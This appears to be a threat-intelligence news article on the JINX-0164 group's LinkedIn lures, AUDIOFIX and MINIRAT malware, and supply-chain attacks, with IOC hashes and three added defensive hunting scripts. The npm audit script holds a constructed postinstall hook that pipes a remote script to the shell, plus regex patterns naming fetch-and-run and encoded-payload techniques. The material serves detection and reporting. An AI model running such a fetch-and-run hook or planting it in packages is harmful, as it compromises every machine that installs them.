A newly identified threat actor tracked as JINX-0164 is targeting cryptocurrency organizations through sophisticated LinkedIn-based social engineering campaigns.
The financially motivated group has been active since at least mid-2025 and combines custom macOS malware, credential theft and CI/CD pipeline abuse to infiltrate development environments and steal sensitive assets.
The LinkedIn profiles used in these approaches appeared highly credible, often carrying realistic employment histories and professional connections, which made them hard to distinguish from legitimate users.
In several cases, accounts were either hijacked or created solely for the campaign and later deleted after the attack.
The attack chain typically begins with a fake meeting invitation shared via LinkedIn messages. Victims are directed to malicious domains impersonating platforms such as Microsoft Teams.
Once accessed, the site prompts users to download a supposed meeting client or troubleshooting fix, which instead delivers a macOS malware payload.
In one documented case, the malware, dubbed AUDIOFIX, was deployed through a bash script hosted on a spoofed domain resembling an Apple driver portal.
The script selected a payload matching the host architecture, so both Intel and Apple Silicon Macs received a working binary. The malware masqueraded as coreaudiod, the name of the genuine macOS audio daemon, was loaded through launchctl, and established persistence on the infected machine.
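A job that borrows the coreaudiod name but runs from somewhere other than Apple's own binary is a cheap thing to hunt for on every developer Mac. The script below is an added example, not tooling from the Wiz report; it assumes the genuine daemon is /usr/sbin/coreaudiod and that Apple starts it from its own configuration under /System, so any job in a user's or the local LaunchAgents/LaunchDaemons directory that names coreaudiod but points elsewhere deserves a look. The plists embedded in it are constructed samples, not real indicators.

```python
"""Hunt launchd persistence that masquerades as Apple's coreaudiod.

Added example, not code from the report. Assumption: the real audio daemon
is /usr/sbin/coreaudiod and is not started from a plist in the directories
scanned here. The sample plists at the bottom are constructed.
"""
import plistlib
from pathlib import Path

LAUNCHD_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]
GENUINE_COREAUDIOD = "/usr/sbin/coreaudiod"


def program_of(job: dict) -> str:
    """Executable a launchd job would run: Program wins, else argv[0]."""
    if job.get("Program"):
        return str(job["Program"])
    args = job.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def is_coreaudiod_masquerade(job: dict) -> bool:
    """True when the job trades on the coreaudiod name in its label or
    command line but does not run the genuine binary."""
    prog = program_of(job)
    haystack = " ".join([str(job.get("Label", "")), prog,
                         *map(str, job.get("ProgramArguments") or [])]).lower()
    if "coreaudiod" not in haystack:
        return False
    return prog != GENUINE_COREAUDIOD


def check_plist_bytes(data: bytes) -> bool:
    return is_coreaudiod_masquerade(plistlib.loads(data))


def hunt(dirs=LAUNCHD_DIRS) -> list:
    """Paths of suspicious jobs. Unparseable plists are reported as well,
    because a deliberately malformed file can hide from naive tooling."""
    hits = []
    for d in dirs:
        if not d.is_dir():
            continue
        for p in sorted(d.glob("*.plist")):
            try:
                if check_plist_bytes(p.read_bytes()):
                    hits.append(str(p))
            except Exception as exc:
                hits.append(f"{p} (unparseable: {exc})")
    return hits


# Constructed samples for offline use; not indicators from the report.
MALICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.audio.coreaudiod</string>
  <key>ProgramArguments</key><array>
    <string>/Users/dev/Library/Application Support/.cache/coreaudiod</string>
    <string>--daemon</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>Program</key><string>/usr/local/bin/backup</string>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

if __name__ == "__main__":
    print("constructed sample flagged:", check_plist_bytes(MALICIOUS_PLIST))
    for hit in hunt():
        print("suspicious launchd job:", hit)
```

Run it under the developer's own account first (user LaunchAgents) and again with sudo for the system directories; a hit is worth correlating with the hashes in the IOC table and with whatever `launchctl list` shows as the job's PID.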
AUDIOFIX functions as both an infostealer and a remote access Trojan. It harvests extensive data from compromised endpoints, including macOS Keychain credentials, browser passwords, SSH keys, cloud tokens, and cryptocurrency wallet information.
It also hijacks active sessions from applications like Slack, Discord, and Telegram, allowing attackers to expand their reach within organizations.
Wiz researchers said in a report shared with GBhackers that they observed multiple intrusions in which the attackers first approached developers on LinkedIn posing as recruiters or business partners.
Notably, the malware targets cloud infrastructure secrets such as AWS, Azure, and GCP credentials, along with GitHub tokens.
These tokens are then abused to extract sensitive data directly from CI/CD pipelines using tools like nord-stream, enabling attackers to access GitHub Actions secrets and other critical development assets.
JINX-0164 Uses LinkedIn Lures
Rather than focusing heavily on cloud resource exploitation, JINX-0164 prioritizes compromising software development workflows. After gaining access to a developer’s machine, the attackers inject malicious code into internal repositories to propagate the infection.
They employ stealthy Git techniques to avoid detection, including impersonating developers by altering commit author and committer metadata, pushing malicious code directly to main branches, or hijacking existing branches.
As other developers pull and build from these repositories, the malware spreads across the organization’s development infrastructure.
This approach effectively turns trusted codebases into infection vectors, increasing the likelihood of widespread compromise. In some cases, attackers attempted to modify source code to enable further credential theft, particularly targeting cryptocurrency wallets.
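Spoofed commit metadata is exactly what signed commits and a directory check exist to catch. The script below is an added example, not tooling from the report: it reads the output of `git log --format='%h%x09%an%x09%ae%x09%cn%x09%ce%x09%G?' <old>..<new>` for a protected branch and flags any commit that is not carrying a good signature, whose author and committer identities disagree, or whose author address is outside the organisation or does not match the directory name for that address. The log text and directory in it are constructed.

```python
"""Flag commits on a protected branch whose identity cannot be trusted.

Added example, not code from the report. Input is tab-separated git log
output in the format named in the lead-in; SAMPLE_LOG and SAMPLE_DIRECTORY
are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# git's %G? placeholder: 'G' good signature, 'B' bad, 'U' good but untrusted
# key, 'X'/'Y' expired, 'R' revoked, 'E' unverifiable, 'N' no signature.
GOOD_SIGNATURE = "G"


@dataclass(frozen=True)
class Commit:
    sha: str
    author_name: str
    author_email: str
    committer_name: str
    committer_email: str
    signature: str


def parse_git_log(text: str) -> List[Commit]:
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        if len(fields) != 6:
            raise ValueError(f"unexpected git log line: {line!r}")
        commits.append(Commit(*fields))
    return commits


def audit_commits(commits: List[Commit], org_domain: str,
                  directory: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Return (sha, reasons) for every commit that fails a check."""
    findings = []
    for c in commits:
        reasons = []
        if c.signature != GOOD_SIGNATURE:
            reasons.append(f"signature status {c.signature!r} is not a verified signature")
        if (c.author_name, c.author_email) != (c.committer_name, c.committer_email):
            reasons.append("author and committer identities differ")
        email = c.author_email.lower()
        if not email.endswith("@" + org_domain):
            reasons.append(f"author email outside {org_domain}")
        elif directory.get(email) not in (None, c.author_name):
            reasons.append("author name does not match the directory entry for that email")
        if reasons:
            findings.append((c.sha, reasons))
    return findings


# Constructed sample: a genuine signed commit, an unsigned commit whose
# author and committer fields were set to impersonate Alice, and a commit
# authored as Alice but committed from an unrelated identity.
SAMPLE_LOG = "\n".join([
    "3f9a2c1\tAlice Dev\talice@example.com\tAlice Dev\talice@example.com\tG",
    "b77e0d4\tAlice Dev\talice@example.com\tAlice Dev\talice@example.com\tN",
    "91c4ee8\tAlice Dev\talice@example.com\tbuild\tbuild@localhost\tN",
])
SAMPLE_DIRECTORY = {"alice@example.com": "Alice Dev"}

if __name__ == "__main__":
    for sha, reasons in audit_commits(parse_git_log(SAMPLE_LOG),
                                      "example.com", SAMPLE_DIRECTORY):
        print(sha, "; ".join(reasons))
```

The second sample commit is the interesting one: every name and address on it is correct, so only the missing signature gives it away. That is the case for enforcing signed commits in branch protection rather than trusting what `git log` displays, and for running a check like this from a pre-receive hook or a post-push pipeline job rather than on the developer's own machine.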
The group has also demonstrated supply chain attack capabilities. In April 2026, JINX-0164 compromised version 4.9.1 of the npm package @velora-dex/sdk by inserting a malicious script that downloaded a secondary backdoor called MINIRAT.
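A poisoned package release like this one typically rides on an install-time lifecycle hook, which is the first thing to inspect in a tarball before it reaches a build host. The audit below is an added example, not code from the report or from the package's maintainers; it assumes the malicious addition lives in a lifecycle hook, and the package.json in it is a constructed stand-in, not the real @velora-dex/sdk manifest.

```python
"""Audit an npm package.json for lifecycle hooks that fetch and run code.

Added example, not code from the report. Assumes the payload is wired into
an install-time hook; SAMPLE_PACKAGE_JSON and PREVIOUS_SCRIPTS are constructed.
"""
import json
import re
from typing import Dict, List, Tuple

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "prepublish", "preprepare", "postprepare")

# Patterns that rarely belong in the install hook of a library.
RED_FLAGS: Dict[str, str] = {
    "remote fetch": r"\b(curl|wget)\b|https?://",
    "pipe to shell": r"\|\s*(ba|z)?sh\b",
    "inline code eval": r"\bnode\s+-e\b|\beval\b",
    "encoded payload": r"base64\s+(-d|--decode)\b|\bxxd\s+-r\b",
    "background/detach": r"\bnohup\b|&\s*$",
    "touches home dir": r"~/|\$HOME",
}


def audit_scripts(scripts: Dict[str, str]) -> List[Tuple[str, str, List[str]]]:
    """Return (hook, command, matched flags) for each suspicious lifecycle hook."""
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        flags = [name for name, pat in RED_FLAGS.items() if re.search(pat, cmd)]
        if flags:
            findings.append((hook, cmd, flags))
    return findings


def new_or_changed_hooks(old_scripts: Dict[str, str],
                         new_scripts: Dict[str, str]) -> List[str]:
    """Lifecycle hooks that a new release added or altered relative to the
    previous one; a library gaining a hook between patch versions is a
    stronger signal than any single pattern above."""
    return [h for h in LIFECYCLE_HOOKS
            if new_scripts.get(h) and new_scripts.get(h) != old_scripts.get(h)]


def audit_package_json(text: str, previous_scripts: Dict[str, str] = None):
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    return {
        "suspicious": audit_scripts(scripts),
        "new_hooks": new_or_changed_hooks(previous_scripts or {}, scripts),
    }


# Constructed manifest: the previous release had only build/test scripts.
PREVIOUS_SCRIPTS = {"build": "tsc -p .", "test": "jest"}
SAMPLE_PACKAGE_JSON = """{
  "name": "@example/sdk",
  "version": "4.9.1",
  "scripts": {
    "build": "tsc -p .",
    "test": "jest",
    "postinstall": "curl -fsSL https://cdn.example.invalid/u.sh | sh"
  }
}"""

if __name__ == "__main__":
    report = audit_package_json(SAMPLE_PACKAGE_JSON, PREVIOUS_SCRIPTS)
    for hook, cmd, flags in report["suspicious"]:
        print(f"{hook}: {cmd}  [{', '.join(flags)}]")
    print("hooks added since previous release:", report["new_hooks"])
```

Run this over the manifest from `npm pack <pkg>@<version>` before the version is allowed into the lockfile, and keep `npm ci --ignore-scripts` (or `ignore-scripts=true` in .npmrc) on CI runners and developer machines so that a hook which slips past review still does not execute at install time.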

Unlike AUDIOFIX, MINIRAT is a lightweight Go-based backdoor focused on command execution and system reconnaissance.
Both malware families communicate with their command-and-control servers over HTTPS and share infrastructure, including domains such as datahub[.]ink. The attackers also routed their activity through commercial VPN services (Mullvad, Astrill and ExpressVPN) to obscure its origin.
Although some tactics resemble those used by known North Korean threat groups, researchers found no direct infrastructure overlap, suggesting JINX-0164 is a distinct and capable actor.
Their consistent focus on developers and cryptocurrency platforms highlights a strategic effort to maximize financial gain while exploiting trust within software supply chains.
Indicators of Compromise (IOCs)
| Family | Variant / delivery theme (infrastructure) | SHA-256 |
|---|---|---|
| MINIRAT | ARM64 | 0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270 |
| MINIRAT | x86_64 | 0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d |
| MINIRAT | ARM64 | a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b |
| AUDIOFIX | HTTPS C2 / ARM64 | 65cba741fe30fa4799fb9002ea8de6d96042a59159dd7c3419c766af24c835e6 |
| AUDIOFIX | HTTPS C2 / x86_64 | 0b1a36a31b952341a534fe24890f1ed2921ee259773cff46e4f6273b8c4d5d21 |
| AUDIOFIX | Dropbox C2 / ARM64 | e8ee6f5145c9d503c5130bfc6585567f6e19d409158c3c0ca0b259f1875b15f4 |
| AUDIOFIX | Dropbox C2 / x86_64 | 3e3901519c2305fbe9d5483b7234c25c6d2b562512916481d96f26b849c39fdb |
| Dropper | Fake audio fix (apple[.]driver-store[.]com) | 9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a |
| Dropper | Fake audio fix (apple[.]driver-update[.]io) | 402625ec79e3573a80b6de9b33fc1e503e3c7803603cd958ddd515fb0549007c |
| Dropper | Fake audio fix (driver-updater[.]net) | b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17 |
| Dropper | Fake Chrome update (apple[.]driver-store[.]com) | d4e863f9818bfb2f1dd932df6441dff204e6142c3bdb55b298cb08dc7b6a0c62 |
| Dropper | Delivered via supply chain (89[.]36[.]224[.]5) | c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e |
| Dropper | Delivered via supply chain (89[.]36[.]224[.]5) | 2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.